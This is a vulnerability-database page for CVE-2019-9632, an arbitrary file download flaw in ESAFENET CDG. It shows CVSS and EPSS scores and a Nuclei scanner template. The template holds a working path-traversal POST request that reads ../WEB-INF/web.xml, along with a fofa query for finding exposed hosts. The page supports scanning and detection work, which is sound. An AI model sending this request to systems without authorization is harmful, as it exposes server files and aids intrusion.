Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2019-9632
HistoryMar 23, 2024 - 10:22 a.m.

ESAFENET CDG - Arbitrary File Download

2024-03-2310:22:28
ProjectDiscovery
github.com
20
esafenet
electronic
document
security
management
vulnerability
filename
download
jsp
arbitrary
file
cvss
web
post
application
matchers
status
servlet
name

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.043

Percentile

92.5%

JSON
ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.

id: CVE-2019-9632

info:
  name: ESAFENET CDG - Arbitrary File Download
  author: pdteam
  severity: high
  description: |
    ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
  reference:
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9632
    epss-score: 0.05368
    epss-percentile: 0.93097
    cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: esafenet
    product: "electronic_document_security_management_system"
    fofa-query: "title=\"į”ĩ子文æĄŖ厉全įŽĄį†įŗģįģŸ\""
  tags: cve,cve2019,esafenet,lfi

http:
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/ClientAjax"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<servlet-name>CDGPermissions</servlet-name>"
# digest: 4b0a00483046022100ec4949b3b2d4acb6481239e29b0bc11adec43ee83dc158bd36713227e1773414022100ed38f18a585bda6e3e86c8fd11e6c024bb59f285a9b3e3585cd4ee94184d6757:922c64590222798bb761d5b6d8e72950

Related

cvelist 1
prion 1
cve 1
nvd 1
cvelist
cvelist
CVE-2019-9632
2019-03-08 06:00:00
prion
prion
Design/Logic Flaw
2019-03-08 07:29:00
cve
cve
CVE-2019-9632
2019-03-08 07:29:00
nvd
nvd
CVE-2019-9632
2019-03-08 07:29:00

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.043

Percentile

92.5%

JSON
Related for NUCLEI:CVE-2019-9632
cvelist1prion1cve1nvd1